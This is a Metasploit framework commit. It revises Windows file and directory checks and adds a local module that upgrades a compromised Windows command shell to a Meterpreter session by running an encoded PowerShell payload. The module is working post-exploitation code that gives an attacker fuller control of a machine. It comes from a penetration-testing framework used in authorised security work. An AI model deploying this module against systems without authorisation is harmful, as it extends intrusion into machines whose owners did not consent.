Land rapid7#2936 - Windows Command Shell Upgrade (Powershell)

wchen-r7 · wchen-r7 · commit bd23fcf4b7b4 · 2014-02-07T17:39:06.000-06:00
diff --git a/lib/msf/core/post/file.rb b/lib/msf/core/post/file.rb
@@ -41,13 +41,14 @@ def directory?(path)
       return stat.directory?
     else
       if session.platform =~ /win/
-        # XXX
+        f = cmd_exec("cmd.exe /C IF exist \"#{path}\\*\" ( echo true )")
       else
         f = session.shell_command_token("test -d '#{path}' && echo true")
-        return false if f.nil? or f.empty?
-        return false unless f =~ /true/
-        return true
       end
+
+      return false if f.nil? or f.empty?
+      return false unless f =~ /true/
+      return true
     end
   end
 
@@ -72,22 +73,17 @@ def file?(path)
       return stat.file?
     else
       if session.platform =~ /win/
-        out = session.shell_command_token("type \"#{path}\"").to_s.strip
-        # Possible error messages when opening a file, see:
-        # http://technet.microsoft.com/en-us/library/cc956687.aspx
-        if out =~ /^The system cannot find the path specified/
-          return false
-        elsif out =~ /^The filename, directory name, or volume label syntax is incorrect/ 
-          return false
-        else
-          return true
+        f = cmd_exec("cmd.exe /C IF exist \"#{path}\" ( echo true )")
+        if f =~ /true/
+          f = cmd_exec("cmd.exe /C IF exist \"#{path}\\\\\" ( echo false ) ELSE ( echo true )")
         end
       else
         f = session.shell_command_token("test -f '#{path}' && echo true")
-        return false if f.nil? or f.empty?
-        return false unless f =~ /true/
-        return true
       end
+
+      return false if f.nil? or f.empty?
+      return false unless f =~ /true/
+      return true
     end
   end
 
diff --git a/modules/exploits/windows/local/powershell_cmd_upgrade.rb b/modules/exploits/windows/local/powershell_cmd_upgrade.rb
@@ -0,0 +1,49 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Exploit::Powershell
+  include Post::File
+
+  def initialize(info={})
+    super( update_info( info,
+        'Name'          => 'Windows Command Shell Upgrade (Powershell)',
+        'Description'   => %q{
+          This module executes Powershell to upgrade a Windows Shell session
+          to a full Meterpreter session.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [
+            'Ben Campbell <eat_meatballs[at]hotmail.co.uk>'
+          ],
+        'DefaultOptions' =>
+            {
+                'WfsDelay'     => 10,
+            },
+        'DisclosureDate' => 'Jan 01 1999',
+        'Platform'      => [ 'win' ],
+        'SessionTypes'  => [ 'shell' ],
+        'Targets' => [ [ 'Universal', {} ] ],
+        'DefaultTarget' => 0
+      ))
+  end
+
+  def exploit
+    psh_path = "\\WindowsPowerShell\\v1.0\\powershell.exe"
+
+    if file? "%WINDIR%\\System32#{psh_path}"
+      print_status("Executing powershell command line...")
+      cmd_exec(cmd_psh_payload(payload.encoded))
+    else
+      fail_with(Exploit::Failure::NotVulnerable, "No powershell available.")
+    end
+  end
+
+end
+
